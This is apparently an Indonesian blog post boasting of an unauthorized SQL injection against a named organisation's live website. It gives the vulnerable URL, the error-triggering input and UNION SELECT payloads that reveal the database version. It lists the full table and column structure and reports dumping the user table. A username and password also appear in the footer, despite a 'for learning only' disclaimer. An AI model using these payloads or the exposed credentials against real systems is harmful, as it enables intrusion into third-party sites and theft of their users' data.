Pertama Sorry buat admin www.koalisi.org saya menggunakan websitenya untuk penetrasi sekaligus menanggapi postingan diforum bitsmikro. Tenang admin, saya tidak melakukan apa - apa di website anda. Hahaha. Cukup bangun dari tidur lama anda, lalu patch websitenya.
Target :
http://www.koalisi.org/berita.php?m=4&sm=17
Bug SQLi :
http://www.koalisi.org/berita.php?m=4&sm=17'
error
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\' ORDER BY date DESC LIMIT 0,3' at line 2
Cari magic number ( hehehe ) :
http://www.koalisi.org/berita.php?m=4&sm=17+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7--
database version :
http://www.koalisi.org/berita.php?m=4&sm=17+AND+1=2+UNION+SELECT+@@version,1,2,3,4,5,6,7--
Version :
5.0.81-community-log
Nama Database :
koalisi_baru
koalisi_english
Select table from koalisi_baru
blocked: blockedid,ip,polls
cal: id,eventdate,html,title,event
diyur_catmenu: id,category,description,status
diyur_catnews: id,category,description,status
diyur_config: site_name,site_url,banner,site_logo,slogan,startdate,admin_mail,foot1,foot2,
foot3,copyright,Version_Num
diyur_download: id,news_id,filename,description
diyur_iklan: id,customer_id,image,start_date,end_date,description
diyur_menu: id,catmenu_id,menu,link,status
diyur_news: id,menu_id,catnews_id,related_news_id,download_id,date,title,hometext,bodytext,
image_big,image_small,pict_description,status,posted,agenda_tgl_mulai,
agenda_jam_mulai,agenda_tgl_akhir,agenda_jam_akhir,agenda_lokasi
forum-old: pid,ip,author,subject,message,date,lastcomment,email,parent,ncomments,category
forum: pid,ip,author,subject,message,date,lastcomment,email,parent,ncomments,category
forum_cat: id,name,public
ip: ipid,title,ip,vote
jabatan: id,nama_jabatan,kategori,urut
kategori_mitra: id,nama_kategori,status
mitrakoalisi: id,judul,kategori,alamat,kota,telepon,fax,email,website,isi,status,tgl
options: optionid,pollid,options,images,votes,order_id
poll_pilihan: id,pollid,choice,ip,votes
poll_tanya: id,name,question,votes
polls: pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,
subdate,status
struktur_org: id_jabatan,nama,keterangan
testimonial: id,title,link,Description
user: userid,nama,alamat,password,status,ket
Upz lihat ini
user: userid,nama,alamat,password,status,ket
Lanjut gan dump table user , fieldnya userid,password
blablabaa...
lanjut..
ketemu ini
userid : diyur
pass : ( bahaya jadi disembunyiin ya )
Nb : Postingan ini hanya sebagai bahan pembelajaran saja. Efek negatif yang dapat timbul adalah bukan tanggung jawab saya.
Subscribe to:
Post Comments (Atom)
UserName : ade
Password : lingling
Mr.Sakaw - Cyber666